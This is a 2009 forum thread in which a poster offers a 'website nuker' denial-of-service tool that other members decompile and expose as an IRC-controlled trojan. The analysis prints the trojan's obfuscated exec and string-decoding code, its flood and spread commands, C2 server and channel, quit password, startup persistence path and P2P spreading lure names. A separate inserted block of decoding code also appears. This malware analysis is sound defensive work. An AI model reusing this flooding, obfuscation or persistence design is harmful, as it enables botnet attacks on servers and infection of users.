[JAVA] - Website NUKER



Post by fooibos2 on Mon Feb 16, 2009 7:22 am

Hey everybody,

With this tool you open as many connections as you can to an address.
While you are opening all those connections the server can't handle it anymore and crashes.
If you do this often enough, the website won't be online anymore.

Warning: This software does not work for huge sites with huge servers.

Don't look at the weird domain name, I didn't have anything else.

File link: [Removed]


Re: [JAVA] - Website NUKER

Post by godofcereal on Mon Feb 16, 2009 8:46 am

I'm sure...
I'm off, last year of school and all. I had something longer, but the char limit fucked that up. So yeah, had a good run here. Thanks for the memories. Thanks to the staff and users.

Best regards, your posting whore,
godofcereal

p.s. Defience, you the man ;)


Re: [JAVA] - Website NUKER

Post by aNewHobby4me on Mon Feb 16, 2009 9:22 am

How about posting your source code?
"To understand recursion you must first understand recursion."


Re: [JAVA] - Website NUKER

Post by tgoe on Tue Feb 17, 2009 11:20 am

A quick decompile shows that you've obfuscated the code. Ok.
Digging deeper I see that you load an image file into memory:

// --snip--
try {  InputStream inputstream = (new I()).getClass().getResourceAsStream(""+'I'+'.'+'g'+'i'+'f');
      // --snip--
        while(i != 0)
        {
          int k = inputstream.read(abyte0, j, i);
      // --snip--


Later on is a strange call to exec:
// --snip--
try {  Runtime runtime = Runtime.getRuntime();
  //   52  127:invokestatic    #10  <Method Runtime Runtime.getRuntime()>
  //   53  130:astore_3       
      runtime.exec((new StringBuilder()).append(I.I(137)).append(System.getProperty(I.I(51))).append(I.I(127)).toString());
  //   54  131:aload_3         
  //   55  132:new             #3   <Class StringBuilder>
  //   56  135:dup             
  //   57  136:invokespecial   #4   <Method void StringBuilder()>
  //   58  139:sipush          137
  //   59  142:invokestatic    #70  <Method String I.I(int)>
  //   60  145:invokevirtual   #6   <Method StringBuilder StringBuilder.append(String)>
// --snip--


Turns out those I.I(int) calls are to a method that returns decoded strings from that image file data:
// --snip--
public static final synchronized String I(int i)
  {
    int j = i & 0xff;
  //    0    0:iload_0         
  //    1    1:sipush          255
  //    2    4:iand           
  //    3    5:istore_1       
    if(intern[j] != i)
  //*   4    6:getstatic       #2   <Field int[] intern>
  //*   5    9:iload_1         
  //*   6   10:iaload         
  //*   7   11:iload_0         
  //*   8   12:icmpeq          62
    {
      intern[j] = i;
  //    9   15:getstatic       #2   <Field int[] intern>
  //   10   18:iload_1         
  //   11   19:iload_0         
  //   12   20:iastore         
      if(i < 0)
  //*  13   21:iload_0         
  //*  14   22:ifge            30
        i &= 0xffff;
  //   15   25:iload_0         
  //   16   26:ldc1            #3   <Int 65535>
  //   17   28:iand           
  //   18   29:istore_0       
      String s = (new String(getClass, i, getClass[i - 1] & 0xff)).intern();
  //   19   30:new             #4   <Class String>
  //   20   33:dup             
  //   21   34:getstatic       #5   <Field byte[] getClass>
  //   22   37:iload_0         
  //   23   38:getstatic       #5   <Field byte[] getClass>
  //   24   41:iload_0         
  //   25   42:iconst_1       
  //   26   43:isub           
  //   27   44:baload         
  //   28   45:sipush          255
  //   29   48:iand           
  //   30   49:invokespecial   #6   <Method void String(byte[], int, int)>
  //   31   52:invokevirtual   #7   <Method String String.intern()>
  //   32   55:astore_2       
      getResourceAsStream[j] = s;
  //   33   56:getstatic       #8   <Field String[] getResourceAsStream>
  //   34   59:iload_1         
  //   35   60:aload_2         
  //   36   61:aastore         
    }
    return getResourceAsStream[j];
// --snip--

So... why do you even call exec... with encrypted arguments stored in an image file?


Re: [JAVA] - Website NUKER

Post by nneonneo on Wed Feb 18, 2009 4:42 pm

This is a typical IRC-controlled bot. The control channel is #foo on irc.h4cky0u.org (port 6667). It does in fact do the server flooding as described, but not under your control.

Command list:

.say (unimplemented)
.flood (server, port, socket count)
.update (no args; reloads and "exec"s the new bot)
.httpflood (server, sleeptime, thread count; tries to DoS a server with multiple simultaneous threads)
.download (url; saves, but doesn't execute the file)
.quit (password; quits if the password is "pHeVoS")
.info (no args; writes the os name, version and Java's service pack level to the channel)
.spread (writes the bot to several P2P programs and connected drives)
.scan (unimplemented)

Oh, not to mention the bot herder's username is fooibos, which means that the original poster likely had a hand in it. I would strongly recommend that he be banned for attempting to pass this sort of shit off.

P.S. @tgoe: the data in the .gif is essentially all the constant strings in the code; effectively, this is an alternate way to intern constant strings. The first three bytes are the filesize, and the rest is strings XORed with the low (least-significant) byte of the filesize.


Re: [JAVA] - Website NUKER

Post by tgoe on Wed Feb 18, 2009 9:40 pm

lol, I was banging my head on that .gif


Re: [JAVA] - Website NUKER

Post by nneonneo on Wed Feb 18, 2009 10:32 pm

I decompiled the I class with jad, which I have found to be quite an effective tool for Java decompilation.

This is what I got:

// Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.kpdus.com/jad.html
// Decompiler options: packimports(3)
// Source File Name:   I/I

package I;

import java.io.InputStream;

public class I
{

    public I()
    {
    }

    public static final synchronized String I(int i)
    {
        int j = i & 0xff;
        if(intern[j] != i)
        {
            intern[j] = i;
            if(i < 0)
                i &= 0xffff;
            String s = (new String(getClass, i, getClass[i - 1] & 0xff)).intern();
            getResourceAsStream[j] = s;
        }
        return getResourceAsStream[j];
    }

    static byte getClass[];
    static String getResourceAsStream[] = new String[256];
    static int intern[] = new int[256];

    static
    {
        try
        {
            InputStream inputstream = (new I()).getClass().getResourceAsStream("" + 'I' + '.' + 'g' + 'i' + 'f');
            if(inputstream != null)
            {
                int i = inputstream.read() << 16 | inputstream.read() << 8 | inputstream.read();
                getClass = new byte[i];
                int j = 0;
                byte byte0 = (byte)i;
                byte abyte0[] = getClass;
                while(i != 0)
                {
                    int k = inputstream.read(abyte0, j, i);
                    if(k == -1)
                        break;
                    i -= k;
                    for(k += j; j < k; j++)
                        abyte0[j] ^= byte0;

                }
                inputstream.close();
            }
        }
        catch(Exception exception) { }
    }
}


As you can see, it makes it plainly obvious how the I.gif decoding routine works. I also used Jad on the rest of the source files, then de-interned the strings with a quick Python program I whipped up for that purpose; the entire decompiled source code is quite accessible in this way, and I can even post it if you like (for interest's sake).
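As an added worked example (editor's code, not code from this thread, from nneonneo's script, or from the bot), the I.gif layout nneonneo describes and the decompiled I class written out in Python: it builds a blob in that format from a constructed sample string table, decodes it the way the static initialiser does (3-byte big-endian length, body XORed with the low byte of that length), resolves an offset the way I.I(int) does (the index is the string's first byte, its length is the byte just before it, negative indices are masked with 0xffff), and then de-interns I.I(n) calls in a line of decompiled source, which is the step nneonneo says he did with his own quick script. Two things are assumptions rather than facts from the page: that the body is a contiguous run of [len][bytes] records (consistent with the separators in tgoe's strings dump, but I.I() itself only needs the length byte in front of each referenced offset), and the sample strings and the exec()-shaped line, which are constructed for the demo.

```python
import re

# Constructed sample string table for the demo; not the bot's strings.
SAMPLE_STRINGS = ["java -jar ", "user.home", "\\java.jar",
                  "irc.example.invalid", "JOIN :#demo", 'say "hi"']


def encode_string_table(strings):
    """Build a blob in the layout the decompiled I class reads:
    3-byte big-endian body length, then the body with every byte XORed by the
    low byte of that length ((byte)i in the static initialiser).
    The body is a run of [len][bytes] records (assumed contiguous; I.I() only
    needs body[i-1] to hold the length of the string starting at i).
    Returns (blob, {string: offset}); the offset is what the code passes to I.I()."""
    body = bytearray()
    offsets = {}
    for s in strings:
        raw = s.encode("utf-8")
        if len(raw) > 0xFF:
            raise ValueError("the length is stored in a single byte")
        body.append(len(raw))
        offsets[s] = len(body)            # index of the first string byte
        body += raw
    n = len(body)
    if n > 0xFFFF:
        raise ValueError("I.I() masks negative indices with 0xffff, so offsets stop at 65535")
    key = n & 0xFF                        # key is 0 if the length is a multiple of 256
    header = bytes([(n >> 16) & 0xFF, (n >> 8) & 0xFF, n & 0xFF])
    return header + bytes(b ^ key for b in body), offsets


def decode_body(blob):
    """Inverse of the static initialiser: read the 3-byte length, XOR the rest."""
    if len(blob) < 3:
        raise ValueError("missing length header")
    n = (blob[0] << 16) | (blob[1] << 8) | blob[2]
    body = bytes(b ^ (n & 0xFF) for b in blob[3:3 + n])
    if len(body) != n:
        raise ValueError("truncated body: header says %d, got %d" % (n, len(body)))
    return body


def string_at(body, i):
    """Mirror of I.I(int): the index is the string's first byte and its length
    is body[i-1]. Offsets >= 0x8000 arrive as negative sipush constants and are
    masked with 0xffff exactly as the Java does."""
    if i < 0:
        i &= 0xFFFF
    if not 1 <= i <= len(body):
        raise IndexError("offset %d is outside the string table" % i)
    length = body[i - 1]
    return body[i:i + length].decode("utf-8", "replace")


def string_table(body):
    """Walk the body as contiguous [len][bytes] records -> {offset: string}."""
    table, pos = {}, 0
    while pos < len(body):
        length = body[pos]
        table[pos + 1] = body[pos + 1:pos + 1 + length].decode("utf-8", "replace")
        pos += 1 + length
    return table


def java_string_literal(s):
    """Quote a decoded string so it can be pasted back into Java source."""
    s = (s.replace("\\", "\\\\").replace('"', '\\"')
          .replace("\n", "\\n").replace("\r", "\\r").replace("\t", "\\t"))
    return '"' + s + '"'


_CALL = re.compile(r"\bI\.I\((-?\d+)\)")


def deintern(java_src, body):
    """Replace every I.I(<int>) call in decompiled source with the literal it resolves to."""
    return _CALL.sub(lambda m: java_string_literal(string_at(body, int(m.group(1)))), java_src)


if __name__ == "__main__":
    blob, offs = encode_string_table(SAMPLE_STRINGS)
    body = decode_body(blob)
    for off, s in sorted(string_table(body).items()):
        print("%5d  %r" % (off, s))
    # A line shaped like the exec() call in the decompile, using our own offsets.
    line = ('runtime.exec((new StringBuilder()).append(I.I(%d)).append('
            'System.getProperty(I.I(%d))).append(I.I(%d)).toString());'
            % (offs["java -jar "], offs["user.home"], offs["\\java.jar"]))
    print(deintern(line, body))
```

Running it against a real I.gif means calling decode_body() on the file's bytes and deintern() on each jad output file; string_table() gives the offset-to-string map that tgoe's strings pipe only shows as bare text, which is what you need to match the numeric arguments in the decompile.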


Re: [JAVA] - Website NUKER

Post by tgoe on Wed Feb 18, 2009 11:02 pm

I think I've got it now :)
After your last post I realized I was making it more complicated than it was.

after:
#!/usr/bin/env python

import sys

# Read the resource in binary mode so this works on Python 3 (bytes) as well as 2.
ec = bytearray(open("I.gif", "rb").read())
# The XOR key is the low byte of the body length, i.e. the file size minus the 3-byte header.
ki = (len(ec) - 3) & 0x00ff
ec = ec[3:]

# Write raw bytes, not text, so the decoded data can be piped into strings.
out = getattr(sys.stdout, "buffer", sys.stdout)
out.write(bytes(bytearray(b ^ ki for b in ec)))


then:
$ ./decoder.py | strings > decoded.gif.txt


I got:
[REMOVED]
regedit /a    user.name   C:\Users\G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\java.jar
C:\Documents and Settings\%\Start Menu\Programs\Startup\java.jar
irc.h4cky0u.org
NICK
USER
PING
PONG
JOIN :#foo
fooibos
.say
.flood
.update
.httpflood   .download
File saved
.quit
phEvOs
Quitting
Can't quit
.info
OS:
os.name
   Version:
os.version
   Service pack:
sun.os.patch.level
.spread
.scan   bearshare
c:\DOWNLOADS
d:\DOWNLOADS
e:\DOWNLOADS
f:\DOWNLOADS
limewire'c:\Program Files\Document and Settings\
\Shared'd:\Program Files\Document and Settings\
kazaa'c:\program files\kazaa\my shared folder'd:\program files\kazaa\my shared folder
USB/OTHER-E
USB/OTHER-F
USB/OTHER-G
USB/OTHER-H
USB/OTHER-I
USB/OTHER-J
USB/OTHER-K
USB/OTHER-L
USB/OTHER-M
USB/OTHER-N
USB/OTHER-O
USB/OTHER-P
USB/OTHER-Q
USB/OTHER-R
USB/OTHER-S
USB/OTHER-T
USB/OTHER-U
USB/OTHER-V
USB/OTHER-W
USB/OTHER-X
USB/OTHER-Y
USB/OTHER-Z
192.168.0.
192.168.0.255
\Important.jar   USB/OTHER
\free music.jar
\free games.jar   Found! - & shared directory, copyd files into it$ directory, Could not copy the files
PRIVMSG #foo
User-AgentXMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3
Failed
java -jar
Code reexecuted.
Done flooding
MICRO


Which scratches that itch I had about it being a trojan :D
As for the source, sure. But I've already learned more about java from this than I ever wanted to :lol:

Edit: Removed the URL that was removed in OP :?